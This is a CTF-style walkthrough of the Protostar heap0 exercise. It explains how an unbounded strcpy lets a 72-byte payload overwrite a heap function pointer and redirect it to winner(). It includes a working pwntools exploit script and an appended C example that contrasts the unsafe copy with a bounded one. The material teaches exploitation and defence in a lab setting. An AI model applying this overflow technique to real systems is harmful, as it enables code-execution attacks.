
Exploit-Exercises Protostar Heap0 Write up

  • Jayakrishna Menon V
  • Aug 13, 2015

This exercise provides the most basic of heap overflows. You can see in the source code of heap0 that there is a structure called fp which contains a function pointer also named fp.

The struct of type fp (f) is allocated with malloc and therefore lives on the heap.

The struct of type data (d) is allocated before it, so it also lives on the heap, at a lower address than f.

The object d of type data contains a buffer, name, which holds up to 64 characters. The value of argv[1] is copied into name with strcpy, with no bounds checking, and that is our vulnerability.

Running the program once prints the addresses of d and f (both on the heap, as noted above), and from those you can calculate the offset between the two.

What we need to do is to overwrite the function pointer fp of f and make it point to winner() instead of nowinner().

This is to be done by overflowing the buffer name.

The offset is 72 bytes and the address of winner is 0x80484ad.

So the final exploit, as a Python script using pwntools, is:

    from pwn import *

    # Load the heap0 binary so pack() uses its word size (32-bit).
    context.binary = "heap0"

    # 72 bytes of filler to reach f->fp from the start of d->name,
    # followed by the address of winner() (0x80484ad).
    junk = b"A" * 72
    addr = pack(0x80484ad)

    # Pass the payload as argv[1]; it is strcpy'd into d->name.
    p = process([context.binary.path, junk + addr])
    msg = p.recvall()
    print(msg)
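As an added illustration (not code from this write-up or from Protostar), here is a small C program modelled on the heap0 layout described above, with the unbounded strcpy shown beside a bounded copy that refuses any name that does not fit in the 64-byte buffer, so f->fp can never be reached through it. The struct names, winner/nowinner and run() are assumptions made for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Layout modelled on the write-up's description of heap0 (constructed here,
 * not the original source): a 64-byte name buffer and a separately malloc'd
 * struct holding a function pointer. */
struct data { char name[64]; };
struct fp   { int (*fp)(void); };

int winner(void)   { return 1; }
int nowinner(void) { return 0; }

/* The defect the write-up exploits: strcpy() has no bound, so bytes past
 * name[63] land in whatever malloc placed after d (here f, i.e. the pointer). */
void copy_name_unsafe(struct data *d, const char *src) { strcpy(d->name, src); }

/* Hardened form: refuse anything that does not fit together with its NUL
 * terminator instead of silently truncating. Returns 0 if copied, -1 if refused. */
int copy_name_safe(struct data *d, const char *src)
{
    const char *end = memchr(src, '\0', sizeof d->name);
    if (end == NULL)                     /* no NUL within 64 bytes: too long */
        return -1;
    memcpy(d->name, src, (size_t)(end - src) + 1);
    return 0;
}

/* Same allocation order as heap0, but using the bounded copy. Returns what
 * f->fp() returned (0 = nowinner, 1 = winner), or -1 if the input was refused. */
int run(const char *arg)
{
    struct data *d = malloc(sizeof *d);
    struct fp   *f = malloc(sizeof *f);
    int rc = -1;
    if (d != NULL && f != NULL) {
        f->fp = nowinner;
        if (copy_name_safe(d, arg) == 0)
            rc = f->fp();                /* still nowinner: fp was never touched */
    }
    free(d); free(f);
    return rc;
}

int main(int argc, char **argv)
{
    if (argc < 2) { fprintf(stderr, "usage: %s <name>\n", argv[0]); return 1; }
    printf("result: %d\n", run(argv[1]));
    return 0;
}
```

With the bounded copy, a 63-byte name is accepted and nowinner() still runs, while 64 bytes or the 72-byte payload from the write-up are refused before any copy happens.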
